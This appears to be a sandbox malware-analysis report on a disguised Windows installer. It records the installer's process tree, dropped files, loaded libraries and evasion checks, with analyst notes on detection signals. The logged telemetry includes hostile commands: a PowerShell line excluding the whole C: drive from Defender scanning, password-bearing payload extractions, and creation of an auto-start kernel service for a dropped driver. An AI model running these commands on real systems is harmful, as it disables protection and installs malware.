Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
(The payload archives res.dat and locale3.dat are password-protected 7z files; the passwords are passed with -p on the command line, so they are recoverable from process-creation telemetry and can be used to extract the archives for analysis.)
The remainder of the process tree is a repeated start attempt for the CleverSoar service:
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar (19 occurrences, parent not attributed)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (17 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (1 occurrence, issued directly by the installer stage)
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (13 occurrences)
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 (1 occurrence)
(Nineteen start attempts for one service are consistent with a retry loop that keeps issuing sc start until the driver is running; a burst of sc start for the same service name is itself a usable detection signal.)
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Static file information: File size 7238486 > 1048576
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2206263552.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2206996636.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_004457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 11_2_004457D0
Source: update.vac.1.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x3439bf
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr | Static PE information: real checksum: 0x0 should be: 0x3439bf
Source: update.vac.7.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Static PE information: real checksum: 0x0 should be: 0x6ed131
Source: hrsw.vbc.7.dr | Static PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.13.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.1.dr | Static PE information: section name: .00cfg
Source: update.vac.1.dr | Static PE information: section name: .voltbl
Source: update.vac.1.dr | Static PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.3.tmp.6.dr | Static PE information: section name: .didata
Source: 7zr.exe.7.dr | Static PE information: section name: .sxdata
Source: update.vac.7.dr | Static PE information: section name: .00cfg
Source: update.vac.7.dr | Static PE information: section name: .voltbl
Source: update.vac.7.dr | Static PE information: section name: .#.q
Source: hrsw.vbc.7.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.7.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.7.dr | Static PE information: section name: .#.q
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C0B8C5B push ecx; ret 7_2_6C0B8C6E
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6BF60F00 push ss; retn 0001h 7_2_6BF60F0A
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C186F10 push eax; ret 7_2_6C186F2E
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C0EB9F4 push 004AC35Ch; ret 7_2_6C0EBA0E
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | Code function: 7_2_6C187290 push eax; ret 7_2_6C1872BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_003C45F4 push 0046C35Ch; ret 11_2_003C460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0045FB10 push eax; ret 11_2_0045FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0045FE90 push eax; ret 11_2_0045FEBE
Source: update.vac.1.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.7.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.7.dr | Static PE information: section name: .#.q entropy: 7.193027440134885
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 6521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 3266
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp -> Window / User API: threadDelayed 600
